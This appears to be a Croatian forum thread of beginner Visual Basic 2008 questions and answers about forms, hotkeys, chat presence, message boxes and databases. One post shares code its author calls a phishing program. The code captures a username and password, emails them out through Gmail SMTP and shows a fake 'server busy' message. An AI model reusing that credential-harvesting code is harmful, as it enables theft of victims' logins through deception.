Visual Basic 2008 Programiranje

poruka: 151
|
čitano: 41.801
|
moderatori: Lazarus Long, XXX-Man, vincimus
+/- sve poruke
ravni prikaz
starije poruke gore
13 godina
neaktivan

molim za pomoć, a ne da mi se otvart posebnu temu.

radim na jednom programu i gotovo sve detalje sam uspio rješiti i svladati osim jednog, a to je ubacivanje simbola/znakova iz character map, odnosno stvaranje character map-a te direktno ubacivanje simbola/znakova određenog fonta u RTB.

ako imate koje prijedloge kako to ostvariti, a da ne moram koristiti copy/paste ili neki vanjski program, te po mogućnosti da direktan klik na simbol u mapi ubacuje taj cimbol u RTB koji je trenutno aktivan (više ih je pa zato, ali to nije toliko bitno nadam se).

također, ako imate rješenje u nekom drugom programskom jeziku, slobodno postajte, čisto da vidim princip kako je rješeno pa možda uspijem sam smisliti nešto na osnovu toga. Imam točno određeni, custom napravljeni font iz kojeg se izvlače određeni znakovi po potrebi.

No lollygagging!
Moj PC  
0 0 hvala 0
13 godina
neaktivan

Pozdrav. Imam problem u visual basic 2008 programčiću.Znači radi se o jednom običnom phishing programu 

Ako korisnik ne unese email dobije poruku (email is missing)
Ako ne unese email i pw dobije poruku (email is missing. pw is missing)
Ali ako unese email ali ne unese pw ne izbaci nista. Kako da napravim da u tom slučaju izbaci (pw is missing) odnosno sto nije uredu sa kodom 

Imports System.Net.Mail

If TextBox2.Text = "" Then

MsgBox("E-mail Is Missing")

If Textbox4.text = "" Then

Msgbox("Password Is Mising")

Else

End If

End if

Dim smtpServer As New SmtpClient()

Dim mail As New MailMessage()

smtpServer.Credentials = New Net.NetworkCredential("vasemail@gmail.com", "vasa sifra")

'using gmail

smtpServer.Port = 587

smtpServer.Host = "smtp.gmail.com"

smtpServer.EnableSsl = True

mail = New MailMessage()

mail.From = New MailAddress("vasemail@gmail.com")

mail.To.Add("vasemail@gmail.com")

mail.Subject = "Username: " & TextBox1.Text

mail.Body = "Username : " & TextBox1.Text & ", " & "Password : " & textbox2.text

smtpServer.Send(mail)

MsgBox("Server je zauzet molimo pokušajte ponovno")         

two things are infinite the universe and human stupidity and i'm not sure about the the universe.
Poruka je uređivana zadnji put sri 29.2.2012 0:13 (Galion96).
Moj PC  
0 0 hvala 0
15 godina
neaktivan

Zna li netko kako da se varijabla doda u drugi form ako sam je već dodao u prvom

Da pojasnim:

Planirao sma napraviti nekaku pitalicu koja (uz sve ostalo) broji tocne i netocne odgovore tako sam u Form1 upisao Dim i as integer = 0 (za tocne) i dim a as integer = 0 (za netocne) ali kad se prelazi na drugo pitanje otvara se Form2 tako da mi se taj brojac ponistava...

Moje pitanje je:

Moze li se varijabla iz Form1 "uvesti" u Form2 a da njezino trenutno stanje (npr. pocetno stanje je 0 a sad je 2) ostane? Ako moze molio bi vas da mi kazete kako....

Poruka je uređivana zadnji put sub 31.3.2012 12:55 (ja123789).
Moj PC  
0 0 hvala 0
15 godina
neaktivan
14 godina
neaktivan

kako da napravim program kao skajp da kad posaljem nekom taj chat program da kad on otvori program da meni prikaze da  se on upalio kao na skjpu onaj zeleni tacnik.Dali je to moguce uradit na visual basic 2008 unapred hvala

0 0 hvala 0
15 godina
neaktivan
Re: Visual Basic 2008 Programiranje

Svakako da je moguce, ali nije bas trivijalno ili barem meni niti jedno trivijalno rjesenje ne pada na pamet. Prvo da bi se dva racunala mogla uopce vidjeti svako racunalo mora znati adresu onoga drugoga. Ako ne zelis hardkodirati adrese (sto ionako nije pametno uzevsi u obzir da 99% korisnika koristi dinamicke IP adrese) morao bi omoguciti korisniku da unese IP adresu racunala s kojim se zeli spojiti. To je jednostavno i jeftino, ali ne bas prakticno rjesenje. Za taj problem imas barem dva puno bolja (i kompliciranija, ali se IMO isplati) moguca rjesenja:

• Unajmiti server koji ce stalno biti online i imati stalnu IP adresu (koju potom mozes hardkodirati u te svoje programcice), koji ce razmjenjivati IP adrese medu korisnicima (slicno master serveru u online igrama). To, pretpostavljas, kosta, a i dodatno komplicira stvari jer bi za to rjesenje (osim tih chat programcica) morao isprogramirati i serversku aplikaciju.
  • A mozes i postaviti nekakav DNS servis tipa DynDNS koje ce tvojoj dinamickoj IP adresi dati nekakvu konstantnu domenu preko koje bi uvijek mogao doci do trenutno dodjeljene IP adrese. Naravno, domena treba biti redovno updateana sa trenutno dodjeljenom IP adresom (vecina routera ima mogucnost to raditi za tebe).

Naravno uza sve to znanje nekakvog mreznog API-ja, kao sto je npr WinSock, je neophodno ako kanis prebacivati podatke mrezom.

http://msdn.microsoft.com/en-us/library/system.net.sockets%28VS.80%29.aspx

My computer once beat me at chess, but we got even after a round of boxing.
Poruka je uređivana zadnji put ned 1.4.2012 22:24 (rustweaver).
14 godina
neaktivan

e ovaku druze ja sam napravio tako da kad ocu snekim da se dopisujem upisem njegovu ip i ja se sa njim dopisujem al ja ocu da napravim da vidim kad upalim program da davidim dali on ima na mrezi

15 godina
neaktivan

Pa to je jednostavno. Napravi da program na pocetku odmah posalje nekakav request drugom racunalu, a drugo racunalo onda odgovori na taj request te ti tako znas je li online ili ne.

13 godina
neaktivan
ja123789 kaže...

Zna li netko kako da se varijabla doda u drugi form ako sam je već dodao u prvom

Da pojasnim:

Planirao sma napraviti nekaku pitalicu koja (uz sve ostalo) broji tocne i netocne odgovore tako sam u Form1 upisao Dim i as integer = 0 (za tocne) i dim a as integer = 0 (za netocne) ali kad se prelazi na drugo pitanje otvara se Form2 tako da mi se taj brojac ponistava...

Moje pitanje je:

Moze li se varijabla iz Form1 "uvesti" u Form2 a da njezino trenutno stanje (npr. pocetno stanje je 0 a sad je 2) ostane? Ako moze molio bi vas da mi kazete kako....

Napravi klasu Odgovori, i iz nje povlači i postavljaj vrijednosti varijable. Stavi Public tipove, da im možeš pristupiti iz bilo kojeg prozora.

Dafuq I just read?
14 godina
neaktivan

to bi i ja tio ali neznam kako ja sam pocetnik u oveme nisam bas puno radio na visual basi c

15 godina
neaktivan
stefag40 kaže...

to bi i ja tio ali neznam kako ja sam pocetnik u oveme nisam bas puno radio na visual basi c

Pa napisao si da imas vec dovrsenu komunikaciju izmedu dva racunala. Tj. da mozes chatati, u cemu je problem?

Neka racunalo koje zeli poslati obavijest da je online jednostavno posalje tekst poruku "online" drugom racunalu. Kada drugo racunalo primi poruku, provjeris je li sadrzaj poruke tekst "online" i onda znas kako stvari stoje.

Ako si apsolutni pocetnik onda se nisi trebao zaljetati u nesto ovakvo jer to nije bas za pocetnike.

14 godina
neaktivan

ok

14 godina
neaktivan

Napravio sam sebi mali music player i ocu da npr uzmem neku pjesmu i nanesem je na moj musix player i da ona pocne pjevat kako sad to uradit evo slik

0 0 hvala 0
14 godina
neaktivan

0 0 hvala 0
14 godina
neaktivan

Moze li se sve to sto je napravljno u VS, napraviti i u c#?

kinder milch schokolade

0 0 hvala 0
13 godina
neaktivan
iprogramer kaže...

VS je skraćenica od Visual Studio, to je IDE - razvojno okruženje. Dok, C# je programski jezik.

16 godina
odjavljen
iprogramer kaže...

Ako si mislio portati nešto sa Visual Basica na C#, to se može bez problema jer oba jezika su na .net frameworku. Ima podosta razlika ali uz prilagodbe, VB.net aplikacija se može "prepisati" u C#

http://nighthawk-software.blogspot.com/
14 godina
neaktivan
royalhero kaže...
iprogramer kaže...

VS je skraćenica od Visual Studio, to je IDE - razvojno okruženje. Dok, C# je programski jezik.

Ma to sam i htjeo napisati.

kinder milch schokolade
13 godina
neaktivan

Zahvaljujući CLI-u možeš portati iz svih .NET jezika (F#, C#, VB.NET, C++/CLI)...

15 godina

Zanima me kako mogu buttonu napraviti shortcut sto znaci da npr stavim da je shortcut f1 i kad udjem u igricu i stisnem f1 da program pocinje radit određeni posao?

[www.tpbg.co.cc] Games Download [www.vertex-hosting.com] Website And Game Hosting
Moj PC  
0 0 hvala 0
14 godina
neaktivan
Encyanix kaže...

Zanima me kako mogu buttonu napraviti shortcut sto znaci da npr stavim da je shortcut f1 i kad udjem u igricu i stisnem f1 da program pocinje radit određeni posao?

Probaj ovo

dodaj timer

code

form1_load

timer1.enabled = true

timer1.start

u Timer kucas

Try
            If My.Computer.Keyboard.CapsLock = True And My.Computer.Keyboard.CapsLock = True Then
                Me.Enabled = True
                Me.Show()
            ElseIf My.Computer.Keyboard.AltKeyDown = False And My.Computer.Keyboard.CtrlKeyDown = False Then
                Me.Enabled = False
                Me.Hide()

End If
        Catch ex As Exception
            MsgBox(ex.Message)

End Try

ovo ti raqdi na tipku Caps Lock

14 godina
neaktivan

Pozz trebam, pomoc kako da napravim u msgbox da kad stisnem x da mi se pokaze poruka  dali zelim da izadjem iz programa da ili ne  i kad stisnem ne da ne izlazi is programa  a kad stisnem da da izadje pozz

0 0 hvala 0
13 godina
neaktivan
Mozda ti ovo pomogne:

Private Sub FrmMain_KeyDown(ByVal sender As Object, ByVal e As System.Windows.Forms.KeyEventArgs) Handles Me.KeyDown

If e.KeyCode = Keys.X Then
If MessageBox.Show("Da li ste sigurni da zelite da izadjete?", "Shut down", MessageBoxButtons.YesNoCancel) = Windows.Forms.DialogResult.Yes Then
Me.Close()
Else
End If
End If
End Sub
13 godina
neaktivan

Dobar dan ovako imam malih problema
Treba mi pomoc oko programiranja buttona za dodavanje, brisanje, trazenje korisnika u bazi podataka imam kod alu mi javlja gresku da "txt" nije deklariran jer san kod kopiro od frenda koji ima program na istom principu ko ja znaci on ima videoteku ja igroteku

Jednostavo mi nece prihvatit kod unatoc tome sto je sve u kodu prilagodeno mojoj bazi i stalno javlja error na "txt" nije deklariran
Kako da to rijesim???

Poruka je uređivana zadnji put ned 10.6.2012 13:26 (bubach1989).
Moj PC  
0 0 hvala 0
13 godina
neaktivan

Možda da postaviš kôd?

15 godina

Dali mozda netko zna neki dobar hrvatski forum o pogramiranju u visual basicu i ostalim jezicima?

Jos nemam svoj potpis :(
Moj PC  
0 0 hvala 0
13 godina
neaktivan
Encyanix kaže...

Dali mozda netko zna neki dobar hrvatski forum o pogramiranju u visual basicu i ostalim jezicima?

Ovaj!

Imaš još par, recimo, EliteSecurity, ne znam da li je hrvatski ili srpski. Ako ćeš za Web tu su WebMajstori.

Što fali Bug Forumu? Imaš tu dosta ljudi koji su dobri u svom području.

13 godina
neaktivan
Pozdrav kako smo :-) zanima me dali ima koji dobrovoljac da mi napravi kompletan program sa bazom podataka i suceljem jer jednostavno nemam vremena napraviti program
Ako ima koji dobrovoljac molim da se javi!!

Unaprijed zahvaljujem :-)

Pozdrav
Moj PC  
0 5 hvala 0
13 godina
neaktivan
Nudim zaradu za onoga ko mi napravi program!!!
Moj PC  
0 0 hvala 0
15 godina
neaktivan

Trebam pomoc oko aplikacije u fullscreen

Zanjima me kako da napravim da mi u fullscreen aplikacija izgleda ljepo na svim rezolucijama:D a ne ako radim za jednu na drugoj ce sve bit razbacano

Evo ako to nije jako komlicirano napisite mi a ako je onda necu radit u fs:D

Hvala unaprjed

Moj PC  
0 0 hvala 0
Nova poruka
E-mail:
Lozinka:

vrh stranice